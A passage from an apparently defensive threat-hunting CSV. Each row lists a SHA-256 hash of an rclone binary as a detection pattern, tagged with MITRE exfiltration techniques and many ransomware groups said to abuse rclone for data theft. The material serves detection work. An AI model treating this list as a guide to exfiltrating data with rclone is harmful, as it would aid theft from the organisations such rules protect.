services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*15faf5fb4dcfb25de4ee1d4cf02beee84b1ff88950d9ba53e56e545c6a3dbfc0*",".{0,1000}15faf5fb4dcfb25de4ee1d4cf02beee84b1ff88950d9ba53e56e545c6a3dbfc0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1616dd35a9d247654567642b4202a7b4ad4601b434d3da85671a1558fffbd4b2*",".{0,1000}1616dd35a9d247654567642b4202a7b4ad4601b434d3da85671a1558fffbd4b2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1622c597292ef12023346c95182323df859bce8d97582a00b0f96c7740abf5dd*",".{0,1000}1622c597292ef12023346c95182323df859bce8d97582a00b0f96c7740abf5dd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*162f3ad5ad6b7cc9790807ff92eed85d08bd4b2702f5a2e88237c86e7773bc29*",".{0,1000}162f3ad5ad6b7cc9790807ff92eed85d08bd4b2702f5a2e88237c86e7773bc29.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*164336ad99e7c933c7f9ae24ce118361292a50cc3508bb0a108860b97e17bc87*",".{0,1000}164336ad99e7c933c7f9ae24ce118361292a50cc3508bb0a108860b97e17bc87.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1645bf0391156a98ed8cd08cf74a3b53620e85028c332913f8a6b688c20ee1b9*",".{0,1000}1645bf0391156a98ed8cd08cf74a3b53620e85028c332913f8a6b688c20ee1b9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*16591b2964f18f43e233be8bc1ba3eaf8aad5bc8ea2fb55aab8d01e990da01b6*",".{0,1000}16591b2964f18f43e233be8bc1ba3eaf8aad5bc8ea2fb55aab8d01e990da01b6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*16b3e4ecfb6de838ec64b266e762f83e330fd29c1db5aeae46c12d5261cf2544*",".{0,1000}16b3e4ecfb6de838ec64b266e762f83e330fd29c1db5aeae46c12d5261cf2544.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*16bf64d6996f1f1764831eb66fd3c74c038e7a76ad25f9f9d6944c216da74c2c*",".{0,1000}16bf64d6996f1f1764831eb66fd3c74c038e7a76ad25f9f9d6944c216da74c2c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*174335ec26c20b8351100b7073eefe8d641049df628d4e10aa33cc24018a5836*",".{0,1000}174335ec26c20b8351100b7073eefe8d641049df628d4e10aa33cc24018a5836.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1844a00b5e416fcbb18be60e8519a594ebfb773a930bd1c819397fd22b2616f0*",".{0,1000}1844a00b5e416fcbb18be60e8519a594ebfb773a930bd1c819397fd22b2616f0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*18602b36b09077e090abf0f5f4d846f05ca70e62471ff3d67fdb0bccaa387a9d*",".{0,1000}18602b36b09077e090abf0f5f4d846f05ca70e62471ff3d67fdb0bccaa387a9d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*18d40326c20c254f298564a899eb72419e418bdb7e3273e14efb17ebe0b68d12*",".{0,1000}18d40326c20c254f298564a899eb72419e418bdb7e3273e14efb17ebe0b68d12.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*194364fff5762c071f04644fe223f1fb97be80fc4289d2b20855bd5e943641a2*",".{0,1000}194364fff5762c071f04644fe223f1fb97be80fc4289d2b20855bd5e943641a2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*19c515af1a70491e5a451f62fdfe41573face748e6d6ccd7cd61732fd1a076d5*",".{0,1000}19c515af1a70491e5a451f62fdfe41573face748e6d6ccd7cd61732fd1a076d5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*19e6eaa89377d7e40661f4fa52f6275db06e9785a23413ca7abb7dc64538e82c*",".{0,1000}19e6eaa89377d7e40661f4fa52f6275db06e9785a23413ca7abb7dc64538e82c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*19eea7bdd183eb616b037a97eeee302a9afabdb0a8f5a4bec515214c19348327*",".{0,1000}19eea7bdd183eb616b037a97eeee302a9afabdb0a8f5a4bec515214c19348327.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1a061f3b3048646be65595bc0bd0cff4a9afabac65be1c84ae9e03f577c8aef5*",".{0,1000}1a061f3b3048646be65595bc0bd0cff4a9afabac65be1c84ae9e03f577c8aef5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1a1a3b080393b721ba5f38597305be2dbac3b654b43dfac3ebe4630b4e6406c3*",".{0,1000}1a1a3b080393b721ba5f38597305be2dbac3b654b43dfac3ebe4630b4e6406c3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1a306749771fda249ef439dcb9d82b1a54a72e56d1693853fdceba17f8542759*",".{0,1000}1a306749771fda249ef439dcb9d82b1a54a72e56d1693853fdceba17f8542759.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1a3e926a0edaf65790c39af7e83d4884d39f99b7e95a176b4feb5bc89f051d48*",".{0,1000}1a3e926a0edaf65790c39af7e83d4884d39f99b7e95a176b4feb5bc89f051d48.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1a5142e3dab3f5562a6263bdda31dc4986e9457fc3a8ce0c61c339040d2f175f*",".{0,1000}1a5142e3dab3f5562a6263bdda31dc4986e9457fc3a8ce0c61c339040d2f175f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1a67be9a8bb43e9654b8c888ba700d5c737041952022544dbada4e4032b4d0ac*",".{0,1000}1a67be9a8bb43e9654b8c888ba700d5c737041952022544dbada4e4032b4d0ac.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1ac730e020f0925a3695bd5712803d52c981d31af54413b609fd9878a7ee0ed7*",".{0,1000}1ac730e020f0925a3695bd5712803d52c981d31af54413b609fd9878a7ee0ed7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1aca05451d4f7ecde7301845969dbc9fe7e1ebfde9eb725dfc66df3892f2f8db*",".{0,1000}1aca05451d4f7ecde7301845969dbc9fe7e1ebfde9eb725dfc66df3892f2f8db.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1acf3b83f3433c08fb6f8293709c72a72fbb60ba1514c13cfbe6509b4116afb1*",".{0,1000}1acf3b83f3433c08fb6f8293709c72a72fbb60ba1514c13cfbe6509b4116afb1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1af017efc1e96bfb6cb5e3a1224b503a3a8da4b0333bd8f2fd3bc6022a24f7a8*",".{0,1000}1af017efc1e96bfb6cb5e3a1224b503a3a8da4b0333bd8f2fd3bc6022a24f7a8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1b38c8d5050c47dd6902d8da4b230d832e144d56f2a49affac2185f854223fe1*",".{0,1000}1b38c8d5050c47dd6902d8da4b230d832e144d56f2a49affac2185f854223fe1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1b746db0162248f56dd364a85ff35482f0c8dba3b45f42ed769f8592f0061af3*",".{0,1000}1b746db0162248f56dd364a85ff35482f0c8dba3b45f42ed769f8592f0061af3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1c0511142beb4a6036d9e1915787354e97716a0c72f9aa4c7158ed39fa1542b7*",".{0,1000}1c0511142beb4a6036d9e1915787354e97716a0c72f9aa4c7158ed39fa1542b7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1c89af499e9d81c3ee2af8fa74a88414c22657c3df439f4d812e803bff5671cd*",".{0,1000}1c89af499e9d81c3ee2af8fa74a88414c22657c3df439f4d812e803bff5671cd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1d1fc4833ed95176f590d34e7d43176a20d0ba1aea6791c291808bc95d190f29*",".{0,1000}1d1fc4833ed95176f590d34e7d43176a20d0ba1aea6791c291808bc95d190f29.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1d72abe57369b5731e21252804dea61820c6e2a2ba89d0ce0f39d1253314ba3c*",".{0,1000}1d72abe57369b5731e21252804dea61820c6e2a2ba89d0ce0f39d1253314ba3c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1d7e79f1d90d5cd47d64478cc1b3cb0bcf3fa5ff3da30367825ce1fc9f209214*",".{0,1000}1d7e79f1d90d5cd47d64478cc1b3cb0bcf3fa5ff3da30367825ce1fc9f209214.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1d8e435a1cd0df78492aabd0dc9da9ae977ef0364c53b9253a06796d72f030e7*",".{0,1000}1d8e435a1cd0df78492aabd0dc9da9ae977ef0364c53b9253a06796d72f030e7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*1d975d20bfb5aae07aed840f2af54cafc9281b0f3d4310287413cae69e3b983a*",".{0,1000}1d975d20bfb5aae07aed840f2af54cafc9281b0f3d4310287413cae69e3b983a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - 